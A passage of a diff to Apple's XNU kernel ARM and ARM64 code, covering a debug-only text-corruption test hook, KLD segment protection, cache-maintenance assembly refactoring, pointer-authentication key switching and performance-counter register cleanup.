ARM_UNDEFINED_INSN 0xe7f000f0 +#define ARM_UNDEFINED_INSN_THUMB 0xde00 + +/** + * Forcibly overwrite executable text with an illegal instruction. + * + * @note Only used for xnu unit testing. + * + * @param pa The physical address to corrupt. + * + * @return KERN_SUCCESS on success. + */ +kern_return_t +pmap_test_text_corruption(pmap_paddr_t pa) +{ +#if XNU_MONITOR + return pmap_test_text_corruption_ppl(pa); +#else /* XNU_MONITOR */ + return pmap_test_text_corruption_internal(pa); +#endif /* XNU_MONITOR */ +} + +MARK_AS_PMAP_TEXT kern_return_t +pmap_test_text_corruption_internal(pmap_paddr_t pa) +{ + vm_offset_t va = phystokv(pa); + unsigned int pai = pa_index(pa); + + assert(pa_valid(pa)); + + LOCK_PVH(pai); + + pv_entry_t **pv_h = pai_to_pvh(pai); + assert(!pvh_test_type(pv_h, PVH_TYPE_NULL)); +#if defined(PVH_FLAG_EXEC) + const bool need_ap_twiddle = pvh_get_flags(pv_h) & PVH_FLAG_EXEC; + + if (need_ap_twiddle) { + pmap_set_ptov_ap(pai, AP_RWNA, FALSE); + } +#endif /* defined(PVH_FLAG_EXEC) */ + + /* + * The low bit in an instruction address indicates a THUMB instruction + */ + if (va & 1) { + va &= ~(vm_offset_t)1; + *(uint16_t *)va = ARM_UNDEFINED_INSN_THUMB; + } else { + *(uint32_t *)va = ARM_UNDEFINED_INSN; + } + +#if defined(PVH_FLAG_EXEC) + if (need_ap_twiddle) { + pmap_set_ptov_ap(pai, AP_RONA, FALSE); + } +#endif /* defined(PVH_FLAG_EXEC) */ + + InvalidatePoU_IcacheRegion(va, sizeof(uint32_t)); + + UNLOCK_PVH(pai); + + return KERN_SUCCESS; +} + +#endif /* DEVELOPMENT || DEBUG */ diff --git a/osfmk/arm/pmap.h b/osfmk/arm/pmap.h index 760592fd6..13c58aa15 100644 --- a/osfmk/arm/pmap.h +++ b/osfmk/arm/pmap.h @@ -47,6 +47,7 @@ #include #include #include +#include #include #if defined(__arm64__) #include @@ -331,7 +332,7 @@ extern pmap_paddr_t mmu_uvtop(vm_offset_t va); #define PMAP_GC_WAIT 2 #if DEVELOPMENT || DEBUG -#define pmap_cs_log_h(msg, args...) { if(pmap_cs_log_hacks) printf("PMAP_CS: " msg "\n", args); } +#define pmap_cs_log_h(msg, args...) { if(pmap_cs_log_hacks) printf("PMAP_CS: " msg "\n", ##args); } #define pmap_cs_log pmap_cs_log_h #else @@ -461,7 +462,7 @@ extern void pmap_gc(void); #if HAS_APPLE_PAC extern void * pmap_sign_user_ptr(void *value, ptrauth_key key, uint64_t data, uint64_t jop_key); extern void * pmap_auth_user_ptr(void *value, ptrauth_key key, uint64_t data, uint64_t jop_key); -#endif /* HAS_APPLE_PAC && XNU_MONITOR */ +#endif /* HAS_APPLE_PAC */ /* * Interfaces implemented as macros. @@ -620,10 +621,10 @@ pmap_disable_user_jop(pmap_t pmap); #define PMAP_LEDGER_ALLOC_INDEX 58 #define PMAP_LEDGER_FREE_INDEX 59 -#if HAS_APPLE_PAC && XNU_MONITOR +#if HAS_APPLE_PAC #define PMAP_SIGN_USER_PTR 60 #define PMAP_AUTH_USER_PTR 61 -#endif /* HAS_APPLE_PAC && XNU_MONITOR */ +#endif /* HAS_APPLE_PAC */ #define PHYS_ATTRIBUTE_CLEAR_RANGE_INDEX 66 @@ -636,8 +637,15 @@ pmap_disable_user_jop(pmap_t pmap); #define PMAP_SET_VM_MAP_CS_ENFORCED_INDEX 72 +#define PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX 73 +#define PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX 74 + -#define PMAP_COUNT 74 +#if DEVELOPMENT || DEBUG +#define PMAP_TEST_TEXT_CORRUPTION_INDEX 76 +#endif /* DEVELOPMENT || DEBUG */ + +#define PMAP_COUNT 77 #define PMAP_INVALID_CPU_NUM (~0U) @@ -651,6 +659,18 @@ extern void pmap_cpu_data_init(void); /* Get the pmap per-CPU data for the current CPU. */ extern pmap_cpu_data_t * pmap_get_cpu_data(void); +/* + * For most batched page operations, we pick a sane default page count + * interval at which to check for pending preemption and exit the PPL if found. + */ +#define PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL 64 + +inline bool +pmap_pending_preemption(void) +{ + return !!(*((volatile ast_t*)ast_pending()) & AST_URGENT); +} + #if XNU_MONITOR extern boolean_t pmap_ppl_locked_down; @@ -728,6 +748,10 @@ extern void CleanPoC_DcacheRegion_Force_nopreempt(vm_offset_t va, size_t length) #define pmap_unlock_bit(l, i) hw_unlock_bit(l, i) #endif +#if DEVELOPMENT || DEBUG +extern kern_return_t pmap_test_text_corruption(pmap_paddr_t); +#endif /* DEVELOPMENT || DEBUG */ + #endif /* #ifndef ASSEMBLER */ #if __ARM_KERNEL_PROTECT__ diff --git a/osfmk/arm/proc_reg.h b/osfmk/arm/proc_reg.h index 0ebbf526b..522f7e1c0 100644 --- a/osfmk/arm/proc_reg.h +++ b/osfmk/arm/proc_reg.h @@ -856,6 +856,8 @@ #define ARM_PTE_PNX 0x00000000 /* no privilege execute. not impl */ #define ARM_PTE_PNX_MASK (0< EXPORT_MD_DIR = arm64 +INSTALL_MD_DIR = arm64 + else # $(PLATFORM),MacOSX diff --git a/osfmk/arm64/amcc_rorgn.c b/osfmk/arm64/amcc_rorgn.c index fe0c6f80b..0a7434b30 100644 --- a/osfmk/arm64/amcc_rorgn.c +++ b/osfmk/arm64/amcc_rorgn.c @@ -70,6 +70,7 @@ extern vm_offset_t segTEXTEXECB; extern unsigned long segSizeLAST; extern unsigned long segSizeLASTDATACONST; extern unsigned long segSizeTEXTEXEC; +extern unsigned long segSizeKLD; typedef struct lock_reg { uint32_t reg_offset; // Register offset @@ -113,12 +114,6 @@ static uint64_t lock_group_va[MAX_LOCK_GROUPS][MAX_APERTURES]; SECURITY_READ_ONLY_LATE(bool) csr_unsafe_kernel_text = false; #endif -#if defined(KERNEL_INTEGRITY_KTRR) -#define CTRR_LOCK_MSR ARM64_REG_KTRR_LOCK_EL1 -#elif defined(KERNEL_INTEGRITY_CTRR) -#define CTRR_LOCK_MSR ARM64_REG_CTRR_LOCK_EL1 -#endif - /* * lock_group_t - describes all the parameters xnu needs to know to * lock down the AMCC/IOA (Lock Group) Read Only Region(s) on cold start. @@ -411,7 +406,8 @@ rorgn_stash_range(void) * +------------------+-----------+-----------------------------------+ * | Largest Address | LAST | <- AMCC RO Region End (rorgn_end) | * +------------------+-----------+-----------------------------------+ - * | | TEXT_EXEC | <- KTRR RO Region End (ctrr_end) | + * | | KLD | <- KTRR RO Region End (ctrr_end) | + * | | TEXT_EXEC | | * +------------------+-----------+-----------------------------------+ * | | ... | | * +------------------+-----------+-----------------------------------+ @@ -430,7 +426,7 @@ rorgn_stash_range(void) assert(segSizeLAST == PAGE_SIZE); /* assert that segLAST is contiguous and just after/above/numerically higher than KTRR end */ - assert((ctrr_end + 1) == kvtophys(segTEXTEXECB) + segSizeTEXTEXEC); + assert((ctrr_end + 1) == kvtophys(segTEXTEXECB) + segSizeTEXTEXEC + segSizeKLD); /* ensure that iboot and xnu agree on the amcc rorgn range */ assert((rorgn_begin == ctrr_begin) && (rorgn_end == (ctrr_end + segSizeLASTDATACONST + segSizeLAST))); @@ -443,6 +439,9 @@ rorgn_stash_range(void) * | Largest Address | LAST | <- CTRR/AMCC RO Region End | * | | | (ctrr_end/rorgn_end) | * +------------------+-----------+------------------------------+ + * | | PPLDATA_CONST | + * | | PPLTEXT | | + * | | KLD | | * | | TEXT_EXEC | | * +------------------+-----------+------------------------------+ * | | ... | | @@ -468,49 +467,6 @@ rorgn_stash_range(void) #endif } -#if DEVELOPMENT || DEBUG -static void -assert_all_lock_groups_unlocked(lock_group_t const *lock_groups) -{ - uint64_t reg_addr; - uint64_t ctrr_lock = 0; - bool locked = false; - bool write_disabled = false;; - - assert(lock_groups); - - for (unsigned int lg = 0; lg < MAX_LOCK_GROUPS; lg++) { - for (unsigned int aperture = 0; aperture < lock_groups[lg].aperture_count; aperture++) { -#if HAS_IOA - // Does the lock group define a master lock register? - if (lock_groups[lg].master_lock_reg.reg_mask != 0) { - reg_addr = lock_group_va[lg][aperture] + lock_groups[lg].master_lock_reg.reg_offset; - locked |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].master_lock_reg.reg_mask) == lock_groups[lg].master_lock_reg.reg_value); - } -#endif - for (unsigned int plane = 0; plane < lock_groups[lg].plane_count; plane++) { - // Does the lock group define a write disable register? - if (lock_groups[lg].ctrr_a.write_disable_reg.reg_mask != 0) { - reg_addr = lock_group_va[lg][aperture] + (plane * lock_groups[lg].plane_stride) + lock_groups[lg].ctrr_a.write_disable_reg.reg_offset; - write_disabled |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].ctrr_a.write_disable_reg.reg_mask) == lock_groups[lg].ctrr_a.write_disable_reg.reg_value); - } - - // Does the lock group define a lock register? - if (lock_groups[lg].ctrr_a.lock_reg.reg_mask != 0) { - reg_addr = lock_group_va[lg][aperture] + (plane * lock_groups[lg].plane_stride) + lock_groups[lg].ctrr_a.lock_reg.reg_offset; - locked |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].ctrr_a.lock_reg.reg_mask) == lock_groups[lg].ctrr_a.lock_reg.reg_value); - } - } - } - } - - ctrr_lock = __builtin_arm_rsr64(CTRR_LOCK_MSR); - - assert(!ctrr_lock); - assert(!write_disabled && !locked); -} -#endif - static void lock_all_lock_groups(lock_group_t const *lock_group, vm_offset_t begin, vm_offset_t end) { @@ -562,56 +518,6 @@ lock_all_lock_groups(lock_group_t const *lock_group, vm_offset_t begin, vm_offse } } -static void -lock_mmu(uint64_t begin, uint64_t end) -{ -#if defined(KERNEL_INTEGRITY_KTRR) - - __builtin_arm_wsr64(ARM64_REG_KTRR_LOWER_EL1, begin); - __builtin_arm_wsr64(ARM64_REG_KTRR_UPPER_EL1, end); - __builtin_arm_wsr64(ARM64_REG_KTRR_LOCK_EL1, 1ULL); - - /* flush TLB */ - - __builtin_arm_isb(ISB_SY); - flush_mmu_tlb(); - -#elif defined (KERNEL_INTEGRITY_CTRR) - /* this will lock the entire bootstrap cluster. non bootstrap clusters - * will be locked by respective cluster master in start.s */ - - __builtin_arm_wsr64(ARM64_REG_CTRR_A_LWR_EL1, begin); - __builtin_arm_wsr64(ARM64_REG_CTRR_A_UPR_EL1, end); - -#if !defined(APPLEVORTEX) - /* H12+ changed sequence, must invalidate TLB immediately after setting CTRR bounds */ - __builtin_arm_isb(ISB_SY); /* ensure all prior MSRs are complete */ - flush_mmu_tlb(); -#endif /* !defined(APPLEVORTEX) */ - - __builtin_arm_wsr64(ARM64_REG_CTRR_CTL_EL1, CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT); - __builtin_arm_wsr64(ARM64_REG_CTRR_LOCK_EL1, 1ULL); - - uint64_t current_el = __builtin_arm_rsr64("CurrentEL"); - if (current_el == PSR64_MODE_EL2) { - // CTRR v2 has explicit registers for cluster config. they can only be written in EL2 - - __builtin_arm_wsr64(ACC_CTRR_A_LWR_EL2, begin); - __builtin_arm_wsr64(ACC_CTRR_A_UPR_EL2, end); - __builtin_arm_wsr64(ACC_CTRR_CTL_EL2, CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT); - __builtin_arm_wsr64(ACC_CTRR_LOCK_EL2, 1ULL); - } - - __builtin_arm_isb(ISB_SY); /* ensure all prior MSRs are complete */ -#if defined(APPLEVORTEX) - flush_mmu_tlb(); -#endif /* defined(APPLEVORTEX) */ - -#else /* defined(KERNEL_INTEGRITY_KTRR) */ -#error KERNEL_INTEGRITY config error -#endif /* defined(KERNEL_INTEGRITY_KTRR) */ -} - #if DEVELOPMENT || DEBUG static void assert_amcc_cache_disabled(lock_group_t const *lock_group) @@ -662,8 +568,6 @@ rorgn_lockdown(void) lock_group_t const * const lock_group = find_lock_group_data(); #if DEVELOPMENT || DEBUG - assert_all_lock_groups_unlocked(lock_group); - printf("RO Region Begin: %p End: %p\n", (void *)rorgn_begin, (void *)rorgn_end); printf("CTRR (MMU) Begin: %p End: %p, setting lockdown\n", (void *)ctrr_begin, (void *)ctrr_end); @@ -673,14 +577,6 @@ rorgn_lockdown(void) // Lock the AMCC/IOA PIO lock registers. lock_all_lock_groups(lock_group, phystokv(rorgn_begin), phystokv(rorgn_end)); - /* - * KTRR/CTRR registers are inclusive of the smallest page size granule supported by processor MMU - * rather than the actual page size in use. Load the last byte of the end page, and let the HW - * truncate per the smallest page granule supported. Must use same treament in start.s for warm - * start of APs. - */ - lock_mmu(ctrr_begin, ctrr_end); - // Unmap and free PIO VA space needed to lockdown the lock groups. for (unsigned int lg = 0; lg < MAX_LOCK_GROUPS; lg++) { for (unsigned int aperture = 0; aperture < lock_group[lg].aperture_count; aperture++) { diff --git a/osfmk/arm64/arm_vm_init.c b/osfmk/arm64/arm_vm_init.c index 10c0a455e..728ee8c27 100644 --- a/osfmk/arm64/arm_vm_init.c +++ b/osfmk/arm64/arm_vm_init.c @@ -258,7 +258,9 @@ SECURITY_READ_ONLY_LATE(vm_offset_t) segLINKB; SECURITY_READ_ONLY_LATE(static unsigned long) segSizeLINK; SECURITY_READ_ONLY_LATE(static vm_offset_t) segKLDB; -SECURITY_READ_ONLY_LATE(static unsigned long) segSizeKLD; +SECURITY_READ_ONLY_LATE(unsigned long) segSizeKLD; +SECURITY_READ_ONLY_LATE(static vm_offset_t) segKLDDATAB; +SECURITY_READ_ONLY_LATE(static unsigned long) segSizeKLDDATA; SECURITY_READ_ONLY_LATE(vm_offset_t) segLASTB; SECURITY_READ_ONLY_LATE(unsigned long) segSizeLAST; SECURITY_READ_ONLY_LATE(vm_offset_t) segLASTDATACONSTB; @@ -1338,6 +1340,7 @@ noAuxKC: arm_vm_page_granular_RNX((vm_offset_t)&excepstack_high_guard, PAGE_MAX_SIZE, 0); arm_vm_page_granular_ROX(segKLDB, segSizeKLD, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); + arm_vm_page_granular_RNX(segKLDDATAB, segSizeKLDDATA, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); arm_vm_page_granular_RWNX(segLINKB, segSizeLINK, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); arm_vm_page_granular_RWNX(segPLKLINKEDITB, segSizePLKLINKEDIT, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); // Coalesced kext LINKEDIT segment arm_vm_page_granular_ROX(segLASTB, segSizeLAST, ARM64_GRANULE_ALLOW_BLOCK); // __LAST may be empty, but we cannot assume this @@ -1433,8 +1436,12 @@ arm_vm_physmap_init(boot_args *args) // Slid region between gPhysBase and beginning of protected text arm_vm_physmap_slide(temp_ptov_table, gVirtBase, segLOWEST - gVirtBase, AP_RWNA, 0); - // kext bootstrap segment + // kext bootstrap segments +#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR) + /* __KLD,__text is covered by the rorgn */ arm_vm_physmap_slide(temp_ptov_table, segKLDB, segSizeKLD, AP_RONA, 0); +#endif + arm_vm_physmap_slide(temp_ptov_table, segKLDDATAB, segSizeKLDDATA, AP_RONA, 0); // Early-boot data arm_vm_physmap_slide(temp_ptov_table, segBOOTDATAB, segSizeBOOTDATA, AP_RONA, 0); @@ -1551,10 +1558,17 @@ arm_vm_prot_finalize(boot_args * args __unused) #endif /* __ARM_KERNEL_PROTECT__ */ #if XNU_MONITOR +#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR) + /* __KLD,__text is covered by the rorgn */ for (vm_offset_t va = segKLDB; va < (segKLDB + segSizeKLD); va += ARM_PGBYTES) { pt_entry_t *pte = arm_kva_to_pte(va); *pte = ARM_PTE_EMPTY; } +#endif + for (vm_offset_t va = segKLDDATAB; va < (segKLDDATAB + segSizeKLDDATA); va += ARM_PGBYTES) { + pt_entry_t *pte = arm_kva_to_pte(va); + *pte = ARM_PTE_EMPTY; + } /* Clear the original stack mappings; these pages should be mapped through ptov_table. */ for (vm_offset_t va = segBOOTDATAB; va < (segBOOTDATAB + segSizeBOOTDATA); va += ARM_PGBYTES) { pt_entry_t *pte = arm_kva_to_pte(va); @@ -1589,6 +1603,11 @@ arm_vm_prot_finalize(boot_args * args __unused) arm_vm_page_granular_RNX(segLASTDATACONSTB, segSizeLASTDATACONST, ARM64_GRANULE_ALLOW_BLOCK); } + /* + * __KLD,__text should no longer be executable. + */ + arm_vm_page_granular_RNX(segKLDB, segSizeKLD, ARM64_GRANULE_ALLOW_BLOCK); + /* * Must wait until all other region permissions are set before locking down DATA_CONST * as the kernel static page tables live in DATA_CONST on KTRR enabled systems @@ -1860,6 +1879,7 @@ arm_vm_init(uint64_t memory_size, boot_args * args) segBOOTDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__BOOTDATA", &segSizeBOOTDATA); segLINKB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LINKEDIT", &segSizeLINK); segKLDB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLD", &segSizeKLD); + segKLDDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLDDATA", &segSizeKLDDATA); segPRELINKDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_DATA", &segSizePRELINKDATA); segPRELINKINFOB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_INFO", &segSizePRELINKINFO); segPLKLLVMCOVB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PLK_LLVM_COV", &segSizePLKLLVMCOV); @@ -1877,7 +1897,10 @@ arm_vm_init(uint64_t memory_size, boot_args * args) // fileset has kext PLK_TEXT_EXEC under kernel collection TEXT_EXEC following kernel's LAST segKCTEXTEXECB = (vm_offset_t) getsegdatafromheader(kc_mh, "__TEXT_EXEC", &segSizeKCTEXTEXEC); assert(segPLKTEXTEXECB && !segSizePLKTEXTEXEC); // kernel PLK_TEXT_EXEC must be empty - assert(segLASTB && segSizeLAST); // kernel LAST must not be empty + + assert(segLASTB); // kernel LAST can be empty, but it must have + // a valid address for computations below. + assert(segKCTEXTEXECB <= segLASTB); // KC TEXT_EXEC must contain kernel LAST assert(segKCTEXTEXECB + segSizeKCTEXTEXEC >= segLASTB + segSizeLAST); segPLKTEXTEXECB = segLASTB + segSizeLAST; diff --git a/osfmk/arm64/bsd_arm64.c b/osfmk/arm64/bsd_arm64.c index e4ac467e5..3cee5ff33 100644 --- a/osfmk/arm64/bsd_arm64.c +++ b/osfmk/arm64/bsd_arm64.c @@ -34,7 +34,6 @@ #include #include -#include #include #include #include @@ -164,7 +163,7 @@ dtrace_get_cpu_int_stack_top(void) return getCpuDatap()->intstack_top; } #endif /* CONFIG_DTRACE */ -extern const char *mach_syscall_name_table[]; +extern const char *const mach_syscall_name_table[]; /* ARM64_TODO: remove this. still TODO?*/ extern struct proc* current_proc(void); diff --git a/osfmk/arm64/caches_asm.s b/osfmk/arm64/caches_asm.s index 958bc1936..00760c935 100644 --- a/osfmk/arm64/caches_asm.s +++ b/osfmk/arm64/caches_asm.s @@ -28,6 +28,7 @@ #include #include +#include #include #include #include "assym.s" @@ -126,16 +127,50 @@ L_ipui_done: .endmacro /* - * Detects the presence of an L2 cache and returns 1 if implemented, - * zero otherwise. - * + * Returns the cache configuration for the specified level * $0: Output register + * $1: Cache level register + * $2: Scratch register */ -.macro HAS_L2_CACHE +.macro CACHE_AT_LEVEL mrs $0, CLIDR_EL1 - ubfx $0, $0, #3, #3 // extract L2 cache Ctype - cmp $0, #0x1 - cset $0, hi + add $2, $1, $1, lsl #1 + lsr $0, $0, $2 + and $0, $0, #7 // extract cache type +.endmacro + +/* + * Perform set/way maintenance to the desired cache level + * $0: 'dc' set/way variant, e.g. csw or cisw + * x0: maximum cache level, 0-based, inclusive + */ +.macro DCACHE_SET_WAY + dmb sy + mov x1, #0 +1: + CACHE_AT_LEVEL x2, x1, x3 + cbz x2, 5f // No cache at this level, all higher levels may be skipped + cmp x2, #2 + b.lt 4f // No data cache at this level, skip to next level + mov x2, x1 + GET_CACHE_CONFIG x2, x9, x10, x11 + lsl x2, x1, #1 // level field for cisw/csw, bits 1:3 +2: +3: + dc $0, x2 // clean dcache line by way/set + add x2, x2, x9 // increment set index + tst x2, x10 // look for overflow + b.eq 3b + bic x2, x2, x10 // clear set overflow + adds w2, w2, w11 // increment way + b.cc 2b // loop + dsb sy // ensure completion of prior level maintenance +4: + add x1, x1, #1 + cmp x1, x0 + b.ls 1b // next level +5: + ret .endmacro /* @@ -149,43 +184,14 @@ L_ipui_done: .globl EXT(clean_mmu_dcache) LEXT(CleanPoC_Dcache) #if defined(APPLE_ARM64_ARCH_FAMILY) + dsb sy + ret /* "Fully Coherent." */ #else /* !defined(APPLE_ARM64_ARCH_FAMILY) */ - mov x0, #0 - GET_CACHE_CONFIG x0, x9, x10, x11 - - dmb sy - mov x0, #0 -L_cpcd_dcacheway: -L_cpcd_dcacheline: - dc csw, x0 // clean dcache line by way/set - add x0, x0, x9 // increment set index - tst x0, x10 // look for overflow - b.eq L_cpcd_dcacheline - bic x0, x0, x10 // clear set overflow - adds w0, w0, w11 // increment way - b.cc L_cpcd_dcacheway // loop - - HAS_L2_CACHE x0 - cbz x0, L_cpcd_skipl2dcache - mov x0, #1 - GET_CACHE_CONFIG x0, x9, x10, x11 - - dsb sy - mov x0, #2 -L_cpcd_l2dcacheway: -L_cpcd_l2dcacheline: - dc csw, x0 // clean dcache line by way/set - add x0, x0, x9 // increment set index - tst x0, x10 // look for overflow - b.eq L_cpcd_l2dcacheline - bic x0, x0, x10 // clear set overflow - adds w0, w0, w11 // increment way - b.cc L_cpcd_l2dcacheway // loop -L_cpcd_skipl2dcache: + mrs x0, CLIDR_EL1 + ubfx x0, x0, #24, #3 // extract CLIDR_EL1.LoC + DCACHE_SET_WAY csw #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */ - dsb sy - ret /* * void CleanPoU_Dcache(void) @@ -197,25 +203,14 @@ L_cpcd_skipl2dcache: .globl EXT(CleanPoU_Dcache) LEXT(CleanPoU_Dcache) #if defined(APPLE_ARM64_ARCH_FAMILY) - /* "Fully Coherent." */ -#else /* !defined(APPLE_ARM64_ARCH_FAMILY) */ - mov x0, #0 - GET_CACHE_CONFIG x0, x9, x10, x11 - - dmb sy - mov x0, #0 -L_cpud_dcacheway: -L_cpud_dcacheline: - dc csw, x0 // clean dcache line by way/set - add x0, x0, x9 // increment set index - tst x0, x10 // look for overflow - b.eq L_cpud_dcacheline - bic x0, x0, x10 // clear set overflow - adds w0, w0, w11 // increment way - b.cc L_cpud_dcacheway // loop - #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */ dsb sy ret + /* "Fully Coherent." */ +#else /* !defined(APPLE_ARM64_ARCH_FAMILY) */ + mrs x0, CLIDR_EL1 + ubfx x0, x0, #21, 3 // extract CLIDR_EL1.LoUIS + DCACHE_SET_WAY csw +#endif /* defined(APPLE_ARM64_ARCH_FAMILY) */ /* * void CleanPoU_DcacheRegion(vm_offset_t va, unsigned length) @@ -253,24 +248,30 @@ L_cpudr_loop: .text .align 2 LEXT(CleanPoC_DcacheRegion_internal) - mov x9, #((1<permanent && + if (__improbable(src_zone && !src_zone->z_permanent && kernel_buf_size < nbytes)) { panic("copyio_preflight: kernel buffer 0x%lx has size %lu < nbytes %lu", kernel_addr, kernel_buf_size, nbytes); diff --git a/osfmk/arm64/cswitch.s b/osfmk/arm64/cswitch.s index 8ba394661..1e0e214e6 100644 --- a/osfmk/arm64/cswitch.s +++ b/osfmk/arm64/cswitch.s @@ -201,6 +201,19 @@ #endif +#if CSWITCH_ROP_KEYS + ldr \new_key, [\thread, TH_ROP_PID] + REPROGRAM_ROP_KEYS Lskip_rop_keys_\@, \new_key, \cpudatap, \tmp_key + mov \wsync, #1 +Lskip_rop_keys_\@: +#endif /* CSWITCH_ROP_KEYS */ + +#if CSWITCH_JOP_KEYS + ldr \new_key, [\thread, TH_JOP_PID] + REPROGRAM_JOP_KEYS Lskip_jop_keys_\@, \new_key, \cpudatap, \tmp_key + mov \wsync, #1 +Lskip_jop_keys_\@: +#endif /* CSWITCH_JOP_KEYS */ cbz \wsync, 1f isb sy diff --git a/osfmk/arm64/exception_asm.h b/osfmk/arm64/exception_asm.h index 18fd6df99..411da5630 100644 --- a/osfmk/arm64/exception_asm.h +++ b/osfmk/arm64/exception_asm.h @@ -26,7 +26,6 @@ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ -#include #include #include "assym.s" diff --git a/osfmk/arm64/hibernate_restore.c b/osfmk/arm64/hibernate_restore.c index 2ed851c12..2c985f2f5 100644 --- a/osfmk/arm64/hibernate_restore.c +++ b/osfmk/arm64/hibernate_restore.c @@ -97,6 +97,9 @@ void pal_hib_patchup(pal_hib_ctx_t *ctx) { + /* Reinit the ppl hib lock as it was saved to the hibernation image held. */ + ppl_hib_lock_reinit(); + // DRAM pages are captured from a PPL context, so here we restore all cpu_data structures to a non-PPL context for (int i = 0; i < MAX_CPUS; i++) { pmap_cpu_data_array[i].cpu_data.ppl_state = PPL_STATE_KERNEL; diff --git a/osfmk/arm64/kpc.c b/osfmk/arm64/kpc.c index 973723ffc..d8e732699 100644 --- a/osfmk/arm64/kpc.c +++ b/osfmk/arm64/kpc.c @@ -141,37 +141,6 @@ void kpc_pmi_handler(unsigned int ctr); #define PMESR_EVT_ENCODE(EVT, PMC, OFF) \ (((EVT) & PMESR_PMC_MASK) << PMESR_SHIFT(PMC, OFF)) -/* system registers in the CPMU */ - -#define SREG_PMCR0 "S3_1_c15_c0_0" -#define SREG_PMCR1 "S3_1_c15_c1_0" -#define SREG_PMCR2 "S3_1_c15_c2_0" -#define SREG_PMCR3 "S3_1_c15_c3_0" -#define SREG_PMCR4 "S3_1_c15_c4_0" -#define SREG_PMESR0 "S3_1_c15_c5_0" -#define SREG_PMESR1 "S3_1_c15_c6_0" -#define SREG_PMSR "S3_1_c15_c13_0" -#define SREG_OPMAT0 "S3_1_c15_c7_0" -#define SREG_OPMAT1 "S3_1_c15_c8_0" -#define SREG_OPMSK0 "S3_1_c15_c9_0" -#define SREG_OPMSK1 "S3_1_c15_c10_0" - -#define SREG_PMC0 "S3_2_c15_c0_0" -#define SREG_PMC1 "S3_2_c15_c1_0" -#define SREG_PMC2 "S3_2_c15_c2_0" -#define SREG_PMC3 "S3_2_c15_c3_0" -#define SREG_PMC4 "S3_2_c15_c4_0" -#define SREG_PMC5 "S3_2_c15_c5_0" -#define SREG_PMC6 "S3_2_c15_c6_0" -#define SREG_PMC7 "S3_2_c15_c7_0" -#define SREG_PMC8 "S3_2_c15_c9_0" -#define SREG_PMC9 "S3_2_c15_c10_0" - -#define SREG_PMMMAP "S3_2_c15_c15_0" -#define SREG_PMTRHLD2 "S3_2_c15_c14_0" -#define SREG_PMTRHLD4 "S3_2_c15_c13_0" -#define SREG_PMTRHLD6 "S3_2_c15_c12_0" - /* * The low 8 bits of a configuration words select the event to program on * PMESR{0,1}. Bits 16-19 are mapped to PMCR1 bits. @@ -318,26 +287,26 @@ static void dump_regs(void) { uint64_t val; - kprintf("PMCR0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR0)); - kprintf("PMCR1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR1)); - kprintf("PMCR2 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR2)); - kprintf("PMCR3 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR3)); - kprintf("PMCR4 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR4)); - kprintf("PMESR0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMESR0)); - kprintf("PMESR1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMESR1)); - - kprintf("PMC0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC0)); - kprintf("PMC1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC1)); - kprintf("PMC2 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC2)); - kprintf("PMC3 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC3)); - kprintf("PMC4 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC4)); - kprintf("PMC5 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC5)); - kprintf("PMC6 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC6)); - kprintf("PMC7 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC7)); + kprintf("PMCR0 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C0_0")); + kprintf("PMCR1 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C1_0")); + kprintf("PMCR2 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C2_0")); + kprintf("PMCR3 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C3_0")); + kprintf("PMCR4 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C4_0")); + kprintf("PMESR0 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C5_0")); + kprintf("PMESR1 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C6_0")); + + kprintf("PMC0 = 0x%" PRIx64 "\n", SREG_READ("PMC0")); + kprintf("PMC1 = 0x%" PRIx64 "\n", SREG_READ("PMC1")); + kprintf("S3_2_C15_C2_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C2_0")); + kprintf("S3_2_C15_C3_0 = 0x%" PRIx64 "\n", 